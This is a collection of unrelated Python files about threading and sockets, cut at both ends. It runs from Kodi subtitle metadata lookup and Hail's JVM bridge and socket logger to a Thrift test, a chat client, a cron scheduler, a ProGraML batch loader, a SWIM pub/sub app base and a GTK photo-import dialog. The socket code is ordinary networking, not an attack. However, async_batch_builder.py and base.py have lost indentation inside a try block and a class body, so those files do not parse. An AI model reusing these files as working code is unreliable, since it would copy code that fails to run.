            meta.year = str(result['releaseDate']['year'])
            if result['series'] is not None:
                # episode: pull show info and numbering from the parent series
                meta.tvshow = result['series']['series']['titleText']['text']
                meta.tvshow_year = str(result['series']['series']['releaseDate']['year'])
                meta.season = str(result['series']['episodeNumber']['seasonNumber'])
                meta.episode = str(result['series']['episodeNumber']['episodeNumber'])
        else:
            # imdb_id points at a show: scan its episode listing for the one
            # matching meta.season/meta.episode
            meta.tvshow = result['titleText']['text']
            meta.tvshow_year = str(result['releaseDate']['year'])

            episodes = result['episodes']['result']['edges']
            s_number = int(meta.season)
            ep_number = int(meta.episode)
            found = False
            for episode in episodes:
                ep = episode['node']
                series = ep['series']['episodeNumber']
                if series['episodeNumber'] == ep_number and series['seasonNumber'] == s_number:
                    meta.title = ep['titleText']['text']
                    meta.year = str(ep['releaseDate']['year'])
                    meta.imdb_id = ep['id']
                    found = True

            if not found and result['episodes']['result']['pageInfo']['hasNextPage']:
                # recurse into the next page of episodes
                return __update_info_from_imdb(core, meta, result['episodes']['result']['pageInfo']['endCursor'])
    except:
        return
def __get_basic_info():
    """Collect playback metadata from Kodi InfoLabels into a DictAsObject.

    Falls back to regexes over Player.FilenameAndPath for imdb_id, season and
    episode when the corresponding InfoLabels are empty.
    """
    meta = utils.DictAsObject({})

    meta.year = xbmc.getInfoLabel('VideoPlayer.Year')
    meta.season = xbmc.getInfoLabel('VideoPlayer.Season')
    meta.episode = xbmc.getInfoLabel('VideoPlayer.Episode')
    meta.tvshow = xbmc.getInfoLabel('VideoPlayer.TVShowTitle')
    meta.tvshow_year = ''

    # prefer the original title; fall back to the display title
    meta.title = xbmc.getInfoLabel('VideoPlayer.OriginalTitle')
    if meta.title == '':
        meta.title = xbmc.getInfoLabel('VideoPlayer.Title')

    meta.filename = __get_filename(meta.title)
    meta.filename_without_ext = meta.filename

    meta.imdb_id = xbmc.getInfoLabel('VideoPlayer.IMDBNumber')
    filename_and_path = xbmc.getInfoLabel('Player.FilenameAndPath')

    if meta.imdb_id == '':
        # plugin URLs often embed the tt-id directly in the path
        regex_result = re.search(r'.*(tt\d{7,}).*', filename_and_path, re.IGNORECASE)
        if regex_result:
            meta.imdb_id = regex_result.group(1)

    if meta.season == '':
        regex_result = re.search(r'.*season=(\d{1,}).*', filename_and_path, re.IGNORECASE)
        if regex_result:
            meta.season = regex_result.group(1)

    if meta.episode == '':
        regex_result = re.search(r'.*episode=(\d{1,}).*', filename_and_path, re.IGNORECASE)
        if regex_result:
            meta.episode = regex_result.group(1)

    return meta
def get_meta(core):
    """Build the full metadata object for the currently playing video.

    Pipeline: read Kodi InfoLabels, resolve the IMDb id (with caching),
    enrich from IMDb GraphQL, compute file size/hash (reusing the meta cache
    when id and filename match), sanitize all values to printable strings,
    and optionally start a background scrape of the show's first-air year
    (joinable via meta.tvshow_year_thread).
    """
    meta = __get_basic_info()

    if meta.imdb_id == '':
        # try the imdb-id cache keyed by the basic-info fingerprint, then scrape
        cache_key = cache.hash_data(meta)
        imdb_id_cache = cache.get_imdb_id_cache()
        meta.imdb_id = imdb_id_cache.get(cache_key, '')
        if meta.imdb_id == '':
            __scrape_imdb_id(core, meta)
            if meta.imdb_id != '':
                imdb_id_cache[cache_key] = meta.imdb_id
                cache.save_imdb_id_cache(imdb_id_cache)
            if meta.tvshow_year != '':
                # the scrape may also have discovered the show's year
                tvshow_years_cache = cache.get_tvshow_years_cache()
                tvshow_years_cache[meta.imdb_id] = meta.tvshow_year
                cache.save_tvshow_years_cache(tvshow_years_cache)

    if meta.imdb_id != '':
        __update_info_from_imdb(core, meta)

    meta_cache = cache.get_meta_cache()
    if meta.imdb_id != '' and meta_cache.imdb_id == meta.imdb_id and meta_cache.filename == meta.filename:
        # same file as last time: reuse the cached size/hash
        meta = meta_cache
    else:
        meta.filesize = ''
        meta.filehash = ''
        try:
            filepath = xbmc.Player().getPlayingFile()
            __set_size_and_hash(core, meta, filepath)
        except:
            import traceback
            traceback.print_exc()

    try:
        meta.filename_without_ext = os.path.splitext(meta.filename)[0]
    except: pass

    # round-trip through JSON, then strip non-printable/non-ASCII characters
    meta_json = json.dumps(meta, indent=2)
    logger.debug(meta_json)
    meta = json.loads(meta_json)
    meta = utils.DictAsObject(meta)
    for key in meta.keys():
        value = utils.strip_non_ascii_and_unprintable(meta[key])
        meta[key] = str(value).strip()

    cache.save_meta_cache(meta)

    meta.is_tvshow = meta.tvshow != ''
    meta.is_movie = not meta.is_tvshow

    # only some subtitle services need the show's first-air year
    tvshow_year_requiring_service_enabled = (
        get_bool_setting('podnadpisi', 'enabled') or
        get_bool_setting('addic7ed', 'enabled')
    )

    if meta.is_tvshow and meta.imdb_id != '' and meta.tvshow_year == '' and tvshow_year_requiring_service_enabled:
        tvshow_years_cache = cache.get_tvshow_years_cache()
        tvshow_year = tvshow_years_cache.get(meta.imdb_id, '')
        if tvshow_year != '':
            meta.tvshow_year = tvshow_year
        else:
            # scrape in the background so playback startup is not delayed
            meta.tvshow_year_thread = threading.Thread(target=__scrape_tvshow_year, args=(core, meta))
            meta.tvshow_year_thread.start()

    return meta
|
java.py | import socketserver
import socket
import sys
import re
from threading import Thread
import py4j
import hail
class FatalError(Exception):
    """:class:`.FatalError` is an error thrown by Hail method failures.

    Raised by the wrapper produced in :func:`handle_java_exception`, with the
    Java stack trace and Hail version folded into the message.
    """
class Env:
    """Process-wide registry of lazily initialized JVM/Hail singletons.

    All state is class-level; the accessors bootstrap the HailContext on
    first use.
    """

    _jvm = None
    _gateway = None
    _hail_package = None
    _jutils = None
    _hc = None
    _counter = 0
    _seed_generator = None

    @staticmethod
    def get_uid():
        # monotonically increasing unique identifier for generated names
        Env._counter += 1
        return "__uid_{}".format(Env._counter)

    @staticmethod
    def jvm():
        """Return the py4j JVM view, initializing Hail on first use."""
        if not Env._jvm:
            Env.hc()
        assert Env._jvm is not None
        return Env._jvm

    @staticmethod
    def hail():
        """Return the Java ``is.hail`` package (cached)."""
        if not Env._hail_package:
            # getattr because `is` is a Python keyword
            Env._hail_package = getattr(Env.jvm(), 'is').hail
        return Env._hail_package

    @staticmethod
    def gateway():
        """Return the py4j gateway, initializing Hail on first use."""
        if not Env._gateway:
            Env.hc()
        assert Env._gateway is not None
        return Env._gateway

    @staticmethod
    def jutils():
        """Return the Scala ``is.hail.utils`` package object (cached)."""
        if not Env._jutils:
            Env._jutils = scala_package_object(Env.hail().utils)
        return Env._jutils

    @staticmethod
    def hc():
        """Return the HailContext, initializing Spark/Hail with defaults on first use."""
        if not Env._hc:
            # deferred import to avoid a cycle with hail.context
            from hail.context import init
            import sys
            sys.stderr.write("Initializing Spark and Hail with default parameters...\n")
            init()
            assert Env._hc is not None
        return Env._hc

    @staticmethod
    def sql_context():
        return Env.hc()._sql_context

    _dummy_table = None

    @staticmethod
    def dummy_table():
        """Return a cached one-row, keyless table for expressions that need a table."""
        if Env._dummy_table is None:
            import hail
            Env._dummy_table = hail.utils.range_table(1, 1).key_by().cache()
        return Env._dummy_table

    @staticmethod
    def set_seed(seed):
        Env._seed_generator = hail.utils.HailSeedGenerator(seed)

    @staticmethod
    def next_seed():
        # lazily create a generator with a default seed on first request
        if Env._seed_generator is None:
            Env.set_seed(None)
        return Env._seed_generator.next_seed()
def jarray(jtype, lst):
    """Copy the Python sequence *lst* into a new Java array of *jtype*."""
    jarr = Env.gateway().new_array(jtype, len(lst))
    for index, item in enumerate(lst):
        jarr[index] = item
    return jarr
def scala_object(jpackage, name):
    """Return the singleton instance (MODULE$) of the Scala object *name*
    inside *jpackage*."""
    companion = getattr(jpackage, name + '$')
    return getattr(companion, 'MODULE$')
def scala_package_object(jpackage):
    """Return the package object singleton of *jpackage*."""
    return scala_object(jpackage, 'package')

def jnone():
    """Return the Scala ``None`` singleton."""
    return scala_object(Env.jvm().scala, 'None')

def jsome(x):
    """Wrap *x* in a Scala ``Some``."""
    return Env.jvm().scala.Some(x)

def joption(x):
    """Convert *x* to a Scala Option.

    NOTE(review): truthiness is used here, so falsy values (0, '', False)
    also map to jnone() — confirm this is intended for numeric arguments.
    """
    return jsome(x) if x else jnone()

def from_option(x):
    """Unwrap a Scala Option, returning None when it is undefined."""
    return x.get() if x.isDefined() else None

def jindexed_seq(x):
    """Convert a Python list via the JVM-side arrayListToISeq."""
    return Env.jutils().arrayListToISeq(x)

def jset(x):
    """Convert a Python list via the JVM-side arrayListToSet."""
    return Env.jutils().arrayListToSet(x)

def jindexed_seq_args(x):
    """Like jindexed_seq, but a bare string is first wrapped in a list."""
    args = [x] if isinstance(x, str) else x
    return jindexed_seq(args)

def jset_args(x):
    """Like jset, but a bare string is first wrapped in a list."""
    args = [x] if isinstance(x, str) else x
    return jset(args)

def jiterable_to_list(it):
    """Materialize a Java Iterable as a Python list (None passes through)."""
    if it is not None:
        return list(Env.jutils().iterableToArrayList(it))
    else:
        return None
def escape_str(s):
    """Escape *s* via the JVM-side escapePyString."""
    return Env.jutils().escapePyString(s)
def parsable_strings(strs):
    """Render *strs* as a parenthesized, space-separated list of quoted,
    escaped strings."""
    quoted = ['"{}"'.format(escape_str(s)) for s in strs]
    return '({})'.format(' '.join(quoted))
# identifiers made of word characters need no quoting
_parsable_str = re.compile(r'[\w_]+')

def escape_parsable(s):
    """Return *s* quoted in backticks (with internal backticks escaped)
    unless it is already a plain parsable identifier."""
    if _parsable_str.fullmatch(s):
        return s
    escaped = s.encode('unicode_escape').decode('utf-8').replace('`', '\\`')
    return '`{}`'.format(escaped)
def unescape_parsable(s):
    """Invert escape_parsable's quoting: unescape backticks, then undo the
    unicode_escape encoding."""
    return s.replace('\\`', '`').encode('utf-8').decode('unicode_escape')
def escape_id(s):
    """Escape *s* via the JVM-side escapeIdentifier."""
    return Env.jutils().escapeIdentifier(s)
def jarray_to_list(a):
    """Materialize *a* as a Python list; falsy inputs (None, empty) yield None."""
    if not a:
        return None
    return list(a)
class Log4jLogger:
    """Lazy accessor for the JVM-side logging utilities."""

    log_pkg = None

    @staticmethod
    def get():
        # cache the jutils handle on first use
        if Log4jLogger.log_pkg is None:
            Log4jLogger.log_pkg = Env.jutils()
        return Log4jLogger.log_pkg
def error(msg):
    """Log *msg* at ERROR level via the JVM-side logger."""
    Log4jLogger.get().error(msg)

def warn(msg):
    """Log *msg* at WARN level via the JVM-side logger."""
    Log4jLogger.get().warn(msg)

def info(msg):
    """Log *msg* at INFO level via the JVM-side logger."""
    Log4jLogger.get().info(msg)
def handle_java_exception(f):
    """Wrap *f* so py4j/Spark Java exceptions are re-raised as FatalError.

    NoSuchElementException is passed through untouched because py4j uses it
    internally to terminate array iteration.
    """
    def deco(*args, **kwargs):
        import pyspark
        try:
            return f(*args, **kwargs)
        except py4j.protocol.Py4JJavaError as e:
            s = e.java_exception.toString()

            # py4j catches NoSuchElementExceptions to stop array iteration
            if s.startswith('java.util.NoSuchElementException'):
                raise

            # handleForPython returns a Scala pair: (deepest cause, full trace)
            tpl = Env.jutils().handleForPython(e.java_exception)
            deepest, full = tpl._1(), tpl._2()
            raise FatalError('%s\n\nJava stack trace:\n%s\n'
                             'Hail version: %s\n'
                             'Error summary: %s' % (deepest, full, hail.__version__, deepest)) from None
        except pyspark.sql.utils.CapturedException as e:
            raise FatalError('%s\n\nJava stack trace:\n%s\n'
                             'Hail version: %s\n'
                             'Error summary: %s' % (e.desc, e.stackTrace, hail.__version__, e.desc)) from None

    return deco
# module-level patch state: whether the handler is active, and the pristine
# py4j get_return_value kept for restoration
_installed = False
_original = None

def install_exception_handler():
    """Patch py4j's get_return_value so Java exceptions surface as FatalError.

    Idempotent: patches only once; the pristine function is stored in
    _original for uninstall_exception_handler().
    """
    global _installed
    global _original
    if not _installed:
        _original = py4j.protocol.get_return_value
        _installed = True
        # The original `get_return_value` is not patched, it's idempotent.
        patched = handle_java_exception(_original)
        # only patch the one used in py4j.java_gateway (call Java API)
        # NOTE(review): install patches py4j.java_gateway but uninstall below
        # restores py4j.protocol — confirm the asymmetry is intentional.
        py4j.java_gateway.get_return_value = patched

def uninstall_exception_handler():
    """Restore the pristine py4j get_return_value saved at install time."""
    global _installed
    global _original
    if _installed:
        _installed = False
        py4j.protocol.get_return_value = _original
class LoggingTCPHandler(socketserver.StreamRequestHandler):
    """Request handler that copies every received line to sys.stderr."""

    def handle(self):
        for line in self.rfile:
            sys.stderr.write(line.decode("ISO-8859-1"))
class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """Threaded TCP server whose handler threads die with the process and
    whose listening address can be rebound immediately."""

    daemon_threads = True
    allow_reuse_address = True

    def __init__(self, server_address, handler_class):
        socketserver.TCPServer.__init__(self, server_address, handler_class)
def connect_logger(host, port):
    """
    This method starts a simple server which listens on a port for a
    client to connect and start writing messages. Whenever a message
    is received, it is written to sys.stderr. The server is run in
    a daemon thread from the caller, which is killed when the caller
    thread dies.

    If the socket is in use, then the server tries to listen on the
    next port (port + 1). After 25 tries, it gives up.

    :param str host: Hostname for server.
    :param int port: Port to listen on.
    """
    server = None
    tries = 0
    max_tries = 25
    while not server:
        try:
            server = SimpleServer((host, port), LoggingTCPHandler)
        except socket.error:
            # port taken: advance to the next one, up to max_tries
            port += 1
            tries += 1

            if tries >= max_tries:
                sys.stderr.write(
                    'WARNING: Could not find a free port for logger, maximum retries {} exceeded.'.format(max_tries))
                return

    t = Thread(target=server.serve_forever, args=())

    # The thread should be a daemon so that it shuts down when the parent thread is killed
    t.daemon = True
    t.start()

    # tell the JVM-side logging to start writing to the socket we just bound
    Env.jutils().addSocketAppender(host, port)
|
BigFrameTest.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import socket
from threading import Thread
from ThriftTest import ThriftTest
from thrift.transport import TSocket
from thrift.transport.THeaderTransport import MAX_BIG_FRAME_SIZE
from thrift.protocol import THeaderProtocol
from thrift.server import TCppServer
class TestHandler(ThriftTest.Iface):
    """Test service whose testString reply is large enough (input repeated
    2**30 times) to require big-frame transport handling."""

    def testString(self, str):
        # echo the input repeated 2**30 times (~1 GiB for a 1-char input)
        return str * 2**30
def create_server():
    """Start a TCppServer for the ThriftTest service on an ephemeral port.

    The server runs in a daemon thread so it dies with the test process.

    :return: (server, port) tuple.
    """
    processor = ThriftTest.Processor(TestHandler())
    server = TCppServer.TCppServer(processor)

    # bind a throwaway socket to discover a free port for the server
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('0.0.0.0', 0))
    port = sock.getsockname()[1]
    server.setPort(port)

    t = Thread(name="test_tcpp_server", target=server.serve)
    t.daemon = True  # Thread.setDaemon() is deprecated since Python 3.10
    t.start()
    return (server, port)
def create_client(port):
    """Open a THeaderProtocol client to localhost:*port* with the maximum
    frame size raised to MAX_BIG_FRAME_SIZE."""
    # renamed from `socket` to avoid shadowing the socket module
    transport = TSocket.TSocket("localhost", port)
    proto = THeaderProtocol.THeaderProtocol(transport)
    proto.trans.set_max_frame_size(MAX_BIG_FRAME_SIZE)
    proto.trans.open()
    return ThriftTest.Client(proto)
class BigFrameTest(unittest.TestCase):
    """End-to-end check that the header transport carries a reply larger than
    a normal frame once the client raises its max frame size."""

    def testBigFrame(self):
        server, port = create_server()
        with create_client(port) as client:
            # TestHandler multiplies the input by 2**30
            result = client.testString('a')
            self.assertEqual(len(result), 2**30)
|
c.py | import sys, socket, select, threading
def prompt(user):
    """Print the chat prompt for *user* and flush so it appears immediately."""
    sys.stdout.write('{}> '.format(user))
    sys.stdout.flush()
if __name__ == "__main__":
    # chat client: usage `python c.py <user> <host>`; server port is fixed
    if len(sys.argv) < 3:
        print('Usage : python %s user host' % sys.argv[0])
        sys.exit()

    (user, host), port = sys.argv[1:3], 5001

    server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try :
        server_sock.connect((host, port))
    except :
        print('Unable to connect')
        sys.exit()

    print('Start')

    def listen():
        """Background thread: print each server message, then redraw the prompt."""
        while True:
            # block until the server socket is readable
            read_sockets, write_sockets, error_sockets = select.select([server_sock], [], [])
            try:
                data = server_sock.recv(4096).decode()
            except:
                # socket closed/errored: leave the receive loop
                break
            sys.stdout.write('\r%s\n' % data)
            prompt(user)
        print('\rTerminated')

    t = threading.Thread(target=listen)
    t.start()

    prompt(user)
    # main loop: read stdin lines; an empty line closes the connection
    while True:
        msg = sys.stdin.readline().strip()
        if not msg:
            server_sock.close()
            break
        try:
            # wire format: "<user>| <message>"
            server_sock.send(('%s| %s' % (user, msg)).encode())
        except:
            break
        prompt(user)
|
Scheduler.py | from CronMatch import cron_match
from datetime import datetime
from time import sleep
from threading import Thread
from threading import Lock
from threading import Event
class Scheduler:
    """Cron-style scheduler: a background thread wakes at each minute boundary
    and runs every registered callback whose cron expression matches.

    Matching is delegated to cron_match(); a callback is invoked with the
    match result whenever cron_match() returns anything other than False.
    """

    # Retained for backward compatibility; not used internally.
    fn = None

    def __init__(self):
        # Fixed: all mutable state is now per-instance.  The original kept
        # these as class attributes, so every Scheduler instance shared one
        # entry list and tick state (classic mutable-class-attribute bug).
        self._running = False
        self._entries = []        # list of (cron_expression, callback)
        self._last_tick = None    # minute-truncated datetime last processed
        self._tick_thread = None
        self._exit = None         # threading.Event used to interrupt waits
        self._lock = Lock()
        self.start()

    def load_cron(self, cron, fn):
        """Register callback `fn` for every newline-separated line in `cron`."""
        with self._lock:
            entries = cron.split('\n')
            for e in entries:
                self._entries.append((e, fn))

    def stop(self):
        """Signal the tick thread to exit and mark the scheduler stopped."""
        with self._lock:
            if self._running:
                self._exit.set()
                self._running = False
                self._tick_thread = None

    def start(self):
        """Start the background tick thread (no-op while already running)."""
        with self._lock:
            if self._running is False:
                self._tick_thread = Thread(target=self._tick)
                self._exit = Event()
                self._running = True
                self._tick_thread.start()

    def _check_cron(self):
        # Evaluate every entry; cron_match() returns False for "no match",
        # otherwise a payload that is handed to the callback.
        with self._lock:
            for entry in self._entries:
                cron = entry[0]
                fn = entry[1]
                match = cron_match(cron)
                if match is not False:
                    fn(match)

    def _trim_datetime(self, dt=None):
        # Truncate a datetime (default: local now) to minute precision.
        if dt is None:
            dt = datetime.now()
        return datetime(dt.year, dt.month, dt.day, dt.hour, dt.minute, 0, 0)

    def _tick(self):
        while self._running:
            # Sleep until just past the next minute boundary; the Event wait
            # returns early when stop() fires.
            # NOTE(review): the wait is computed from utcnow() but
            # _trim_datetime() uses local now() -- confirm the mix is intended.
            t = datetime.utcnow()
            rem = t.second + (t.microsecond / 1000000)
            self._exit.wait(60.001 - rem)
            # Make extra sure that we don't continue twice in the same minute
            while self._trim_datetime() == self._last_tick:
                self._exit.wait(.1)
            if self._running is False:
                break
            self._last_tick = self._trim_datetime()
            self._check_cron()
        self._running = False
        self._exit = None
async_batch_builder.py | # Copyright 2019-2020 the ProGraML authors.
#
# Contact Chris Cummins <chrisc.101@gmail.com>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module defines a class for asynchronously reading a batch builder."""
import time
from threading import Thread
from typing import List
from absl import logging
from ncc.models.dataflow.base_batch_builder import BaseBatchBuilder
from ncc.models.dataflow.batch_data import BatchData
from ncc import LOGGER
try:
from third_party.programl.programl.util.py import humanize
except ImportError as err:
LOGGER.warning(err)
from third_party.download import download
download('programl')
class AsyncBatchBuilder(object):
    """Drains a batch builder on a background thread into an in-memory list.

    Construction immediately starts a worker thread that iterates the given
    batch builder to completion, so batches accumulate while the caller does
    other work.  Reading the `batches` property blocks until the worker is
    done, after which the same list can be reused freely (e.g. identical
    validation batches across epochs).
    """

    def __init__(self, batch_builder: BaseBatchBuilder):
        self._batches = []
        self._worker = Thread(target=self._Worker, args=(batch_builder,))
        self._worker.start()

    def _Worker(self, batch_builder: BaseBatchBuilder):
        # Runs on the background thread: materialize every batch, then log
        # a completion summary.
        began = time.time()
        self._batches = [batch for batch in batch_builder]
        logging.debug(
            "Async batch loader completed. %s batches loaded in %s",
            humanize.Commas(len(self._batches)),
            humanize.Duration(time.time() - began),
        )

    @property
    def batches(self) -> List[BatchData]:
        """Access the batches. Blocks until all batches are built."""
        self._worker.join()
        return self._batches
|
base.py | """
Copyright 2019 EUROCONTROL
==========================================
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==========================================
Editorial note: this license is an instance of the BSD license template as provided by the Open Source Initiative:
http://opensource.org/licenses/BSD-3-Clause
Details on EUROCONTROL: http://www.eurocontrol.int
"""
import logging.config
import threading
from typing import Optional, List, Callable, Type
from proton.reactor import Container
from swim_pubsub.core.clients import PubSubClient
from swim_pubsub.core import ConfigDict
from swim_pubsub.core.errors import AppError, PubSubClientError
from swim_pubsub.core.broker_handlers import BrokerHandler
from swim_pubsub.core import utils
__author__ = "EUROCONTROL (SWIM)"
class _ProtonContainer:
def __init__(self, handler: Optional[BrokerHandler] = None) -> None:
"""
A `proton.Container` extension allowing threaded running.
:param handler:
"""
self._handler: BrokerHandler = handler
self._thread: Optional[threading.Thread] = None
def is_running(self):
"""
Determines whether the container is running by checking the handler and the underlying thread if it's running in
threaded mode.
:return:
"""
if self._thread:
return self._handler.started and self._thread.is_alive()
else:
return self._handler.started
def run(self, threaded: bool = False):
"""
Runs the container in threaded or not mode
:param threaded:
:return:
"""
if threaded and not self.is_running():
self._thread = threading.Thread(target=self._run)
self._thread.daemon = True
return self._thread.start()
return self._run()
def _run(self):
"""
The actual runner
"""
self._container = Container(self._handler)
self._container.run()
class App(_ProtonContainer):

    def __init__(self, handler: BrokerHandler):
        """
        A `_ProtonContainer` extension which acts like an app by keeping track of:
            - the running of the container.
            - the clients (publishers, subscribers) using it.
            - any actions to be run before the actual run of the container.

        :param handler: broker handler driving the underlying proton container
        """
        super().__init__(handler=handler)
        self._handler: BrokerHandler = handler
        self._before_run_actions: List[Callable] = []
        self.config: Optional[ConfigDict] = None
        self.clients: List[PubSubClient] = []

    def before_run(self, f: Callable):
        """
        Decorator to be used on any action that needs to be run before starting the application. The actions will be run
        in FIFO order.

        Usage:
            >>> handler = BrokerHandler()
            >>> app = App(handler)
            >>>
            >>> @app.before_run
            >>> def action():
            >>>     print("Before run")
            >>>
            >>> app.run()
        """
        if not callable(f):
            raise AppError(f'{f} is not callable')
        self._before_run_actions.append(f)

    def run(self, threaded: bool = False):
        """
        Overrides the container run by first running any action registered via `before_run`.

        :param threaded: run the container on a background thread when True
        """
        for action in self._before_run_actions:
            action()
        super().run(threaded=threaded)

    def register_client(self, username: str, password: str, client_class: Type[PubSubClient] = PubSubClient):
        """
        Creates a new client (publisher, subscriber) that will be using this app.

        :param username: broker username of the client
        :param password: broker password of the client
        :param client_class: PubSubClient or any subclass of it
        :return: the created, validated client
        :raises PubSubClientError: if client_class is not a PubSubClient
            subclass or the user fails validation
        """
        # Fixed: use issubclass() so indirect subclasses are accepted too;
        # the original only inspected direct __bases__, rejecting any
        # grandchild of PubSubClient.
        if not issubclass(client_class, PubSubClient):
            raise PubSubClientError("client_class should be PubSubClient or should inherit from PubSubClient")
        client = client_class.create(self._handler, self.config['SUBSCRIPTION-MANAGER'], username, password)
        if not client.is_valid():
            raise PubSubClientError(f"User '{username}' is not valid")
        self.clients.append(client)
        return client

    def remove_client(self, client: PubSubClient):
        """Remove a previously registered client.

        :raises AppError: if the client was never registered.
        """
        try:
            self.clients.remove(client)
        except ValueError:
            raise AppError(f"PubSubClient {client} was not found")

    @classmethod
    def _create_from_config(cls, config_file: str, broker_handler_class: Type[BrokerHandler]):
        """
        Entry point for creating an App()

        First it parses the config file and then initializes accordingly the BrokerHandler.
        :param config_file: the path of the config file
        :param broker_handler_class: BrokerHandler subclass used to connect to the broker
        """
        config = utils.yaml_file_to_dict(config_file)
        handler = broker_handler_class.create_from_config(config['BROKER'])
        app = cls(handler)
        app.config = config
        # configure logging
        if 'LOGGING' in app.config:
            logging.config.dictConfig(app.config['LOGGING'])
        return app
|
photo_import.py | import threading
from gi.repository import GLib
from gi.repository import Gtk
class ImportOptions(Gtk.ListBox):
    """Two-row options list for the import dialog: "copy photos" and
    "delete originals".

    The current choices are exposed through the `options` dict
    ({'copy_photos': bool, 'delete_originals': bool}), kept in sync with the
    checkboxes by the toggle handlers below.
    """
    def __init__(self):
        super(ImportOptions, self).__init__()
        self.set_selection_mode(Gtk.SelectionMode.NONE)
        # Row 1: "Copy Photos to Library", checked by default.
        copy_photo_row = Gtk.ListBoxRow()
        copy_photo_box = Gtk.Box(
            orientation=Gtk.Orientation.HORIZONTAL, spacing=50)
        copy_photo_label = Gtk.Label(
            "Copy Photos to Library",
            xalign=0,
            halign=Gtk.Align.END
        )
        copy_photo_label.set_halign(Gtk.Align.END)
        copy_photo_checkbox = Gtk.CheckButton()
        copy_photo_checkbox.set_active(True)
        copy_photo_box.pack_start(copy_photo_label, True, True, 0)
        copy_photo_box.pack_end(copy_photo_checkbox, False, True, 0)
        copy_photo_row.add(copy_photo_box)
        self.add(copy_photo_row)
        copy_photo_checkbox.connect('toggled', self.copy_toggled)
        # Row 2: "Delete Originals After Import"; only meaningful when
        # copying is enabled (see copy_toggled).
        self.delete_photo_row = Gtk.ListBoxRow()
        delete_photo_box = Gtk.Box(
            orientation=Gtk.Orientation.HORIZONTAL, spacing=50)
        delete_photo_label = Gtk.Label(
            "Delete Originals After Import",
            xalign=0,
            halign=Gtk.Align.END
        )
        self.delete_photo_checkbox = Gtk.CheckButton()
        delete_photo_box.pack_start(delete_photo_label, True, True, 0)
        delete_photo_box.pack_end(self.delete_photo_checkbox, False, True, 0)
        self.delete_photo_row.add(delete_photo_box)
        self.add(self.delete_photo_row)
        self.delete_photo_checkbox.connect('toggled', self.delete_toggled)
        # Current option values; read by PhotoImporter.
        self.options = {
            'copy_photos': True,
            'delete_originals': False,
        }
    def copy_toggled(self, button):
        # Deleting originals only makes sense while copying: when copy is
        # switched off, disable and clear the delete row as well.
        if button.get_active():
            self.delete_photo_row.set_sensitive(True)
            self.options['copy_photos'] = True
        else:
            self.delete_photo_row.set_sensitive(False)
            self.delete_photo_checkbox.set_active(False)
            self.options['copy_photos'] = False
            self.options['delete_originals'] = False
    def delete_toggled(self, button):
        # Mirror the checkbox state into the options dict.
        if button.get_active():
            self.options['delete_originals'] = True
        else:
            self.options['delete_originals'] = False
    def run(self):
        # NOTE(review): Gtk.ListBox does not define run(); this looks like a
        # leftover from a Gtk.Dialog-based version and is never called by
        # PhotoImporter -- confirm before relying on it.
        return (super(ImportOptions, self).run(), self.options)
class PhotoImporter(Gtk.FileChooserDialog):
    """Folder-chooser dialog that imports the selected folder into the library.

    The actual import runs on a daemon worker thread; every UI update is
    marshalled back onto the GTK main loop via GLib.idle_add.
    """
    def __init__(self, window):
        super(PhotoImporter, self).__init__(
            'Choose folder to import',
            window,
            Gtk.FileChooserAction.SELECT_FOLDER,
            (
                Gtk.STOCK_CANCEL,
                Gtk.ResponseType.CANCEL,
                'Select',
                Gtk.ResponseType.OK,
            ),
        )
        # Embed the copy/delete options below the folder chooser.
        options_box = ImportOptions()
        self.options = options_box.options
        box = self.get_content_area()
        box.set_spacing(3)
        box.pack_start(options_box, True, True, 0)
        box.show_all()
        self._window = window
    def import_photos(self):
        """Show the dialog and, if a folder was chosen, import it in the background."""
        response = self.run()
        if response == Gtk.ResponseType.OK:
            filename = self.get_filename()
        else:
            filename = None
        if filename and response == Gtk.ResponseType.OK:
            def do_import():
                # Worker thread: disable the toolbar buttons and show the
                # progress bar while the library import runs.
                GLib.idle_add(self._window.import_button.set_sensitive, False)
                GLib.idle_add(self._window.export_button.set_sensitive, False)
                GLib.idle_add(self._window.progress.set_fraction, 0)
